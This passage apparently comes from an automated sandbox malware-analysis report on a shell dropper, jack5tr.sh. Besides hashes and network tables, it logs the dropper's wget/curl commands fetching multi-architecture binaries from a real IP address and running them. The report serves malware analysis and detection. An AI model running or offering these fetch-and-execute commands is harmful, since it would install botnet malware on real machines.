[curl -O http://193.37.59.116/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm5]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm6]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm7]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/ppc]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/spc]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/m68k]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/sh4]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
Files
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/RUN
| MD5 | 9c1344aa17dc266ff8f8637b2becfc46 |
| SHA1 | 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee |
| SHA256 | 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4 |
| SHA512 | 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1 |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:36
Platform
debian9-mipsel-20240418-en
Max time kernel
31s
Max time network
34s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/wget
[wget http://193.37.59.116/x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x jack5tr.sh RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mips]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x jack5tr.sh mips RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arc]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/bin/cat
[cat arc]
/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/x86_64]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mpsl]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm5]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm6]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm7]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/ppc]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/spc]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/m68k]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/sh4]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
Files
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/RUN
| MD5 | 9c1344aa17dc266ff8f8637b2becfc46 |
| SHA1 | 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee |
| SHA256 | 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4 |
| SHA512 | 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1 |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:36
Platform
ubuntu2204-amd64-20240522.1-en
Max time kernel
2s
Max time network
131s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/wget
[wget http://193.37.59.116/x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/usr/bin/cat
[cat x86]
/usr/bin/chmod
[chmod +x RUN gdm3-config-err-gfb7nI jack5tr.sh snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mips]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
